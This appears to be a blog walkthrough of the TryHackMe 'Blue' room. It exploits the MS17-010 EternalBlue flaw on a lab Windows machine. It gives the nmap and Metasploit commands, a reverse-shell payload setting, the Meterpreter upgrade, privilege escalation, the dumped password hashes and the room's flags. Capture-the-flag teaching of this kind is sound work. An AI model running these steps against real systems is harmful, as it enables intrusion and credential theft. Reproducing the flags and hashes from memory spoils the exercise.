Tryhackme - Blue

Tryhackme – Blue

In this walk through, we will be going through the Blue room from Tryhackme. This room has a Windows box which is vulnerable to the infamous Eternal Blue Vulnerability, which was responsible for the Wannacry ransomware attack. It will teach you the basic enumeration with nmap and focuses heavily on the exploitation framework Metasploit. After completing this room, you will be confident in exploiting the Eternal Blue in the wild. On that note, let’s get started.

Blue

Machine Info:

TitleBlue
IPaddress10.10.196.85
DifficultyEasy
ObjectiveDeploy & hack into a Windows machine, leveraging common misconfigurations issues.

Task 1 – Recon

Scan and learn what exploit this machine is vulnerable to. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

Question 1 – Scan the machine.

Done
sudo nmap -Pn -A 10.10.196.85
nmap scan

Question 2 – How many ports are open with a port number under 1000?

Windows RPC

3

Question 3 – What is this machine vulnerable to?

sudo nmap --script=vuln 10.10.196.85

nmap scripting engine

ms17-010

Task 1 - Recon

Task 2 – Gain Access

Exploit the machine and gain a foothold.

Question 1 – Start Metasploit

Done

msfconsole

Question 2 – Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

search ms17-010
exploit/windows/smb/ms17_010_eternalblue

Question 3 – Show options and set the one required value. What is the name of this value? (All caps for submission)

show options

set RHOSTS

RHOSTS

Question 4 – Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter: set payload windows/x64/shell/reverse_tcp

Done

set LHOST and RHOST

Exploiting the machine

Question 5 – Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

Done

Windows shell

Task 2 - Gain Access

Task 3 – Escalate

Escalate privileges, learn how to upgrade shells in metasploit.

Question 1 – If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

background session

post/multi/manage/shell_to_meterpreter

post/multi/manage/shell_to_meterpreter

Question 2 – Select this (use MODULE_PATH). Show options, what option are we required to change?

show options

SESSION

Question 3 – Set the required option, you may need to list all of the sessions to find your target here.

Done

sessions -l

sessions -l

Question 4 – Run! If this doesn’t work, try completing the exploit from the previous task once more.

Done

sessions -l command

Question 5 – Once the meterpreter shell conversion completes, select that session for use.

Done

interacting with session

Question 6 – Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

Done

getsystem

Question 7 – List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

Done

Running process

conhost.exe

Question 8 – Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

Done

migrate command

Task 3 - Escalate

Task 3 - Escalate 2

Task 4 – Cracking

Dump the non-default user’s password and crack it!

Question 1 – Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

hashdump

Jon

Question 2 – Copy this password hash to a file and research how to crack it. What is the cracked password?

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Crackstation

Task 5 – Find flags!

Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!

Question 1 – Flag1? This flag can be found at the system root.

Flag 1

flag{access_the_machine}

Question 2 – Flag2? This flag can be found at the location where passwords are stored within Windows.

Flag 2

flag{sam_database_elevated_access}

Question 3 – flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

Flag 3

flag{admin_documents_can_be_valuable}

Task 5 - Find flags!

Also Read: Tryhackme – Blaster

Conclusion:

Conclusion

So that was the “Blue” room for you. Summing it up in a go – We started with a nmap scan leveraging its scripting engine, found out that the machine is vulnerable to MS17-010. Next, we used metasploit to get our initial access. Moving ahead we migrate our payload to other running process, cracked some passwords and finally find our three required flags. In short, it was fun room which can help you learn about a famous vulnerability which still can be found in the wild in legacy systems. For more information, about the vulnerability, check it out here.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top